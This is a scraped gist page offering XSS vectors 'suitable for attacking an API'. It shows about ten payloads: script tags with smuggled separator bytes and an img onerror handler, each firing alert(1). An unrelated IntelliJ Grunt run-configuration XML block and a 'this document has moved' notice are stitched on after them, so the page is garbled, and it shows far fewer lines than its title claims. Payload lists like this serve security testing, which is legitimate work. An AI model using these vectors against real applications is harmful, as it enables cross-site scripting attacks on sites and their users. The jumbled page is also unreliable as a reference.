Skip to content

Instantly share code, notes, and snippets.

@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<component name="ProjectRunConfigurationManager">
<configuration default="false" name="Grunt" type="NodeJSConfigurationType" factoryName="Node.js" path-to-node="C:/Program Files/nodejs/node" path-to-js-file="$USER_HOME$/AppData/Roaming/npm/node_modules/grunt-cli/bin/grunt" application-parameters="--stack" working-dir="$PROJECT_DIR$">
<RunnerSettings RunnerId="NodeJS.debug" />
<RunnerSettings RunnerId="NodeJS.run" />
<ConfigurationWrapper RunnerId="NodeJS.debug" />
<ConfigurationWrapper RunnerId="NodeJS.run" />
<method />
</configuration>
</component>

This document has moved!

It's now here, in The Programmer's Compendium. The content is the same as before, but being part of the compendium means that it's actively maintained.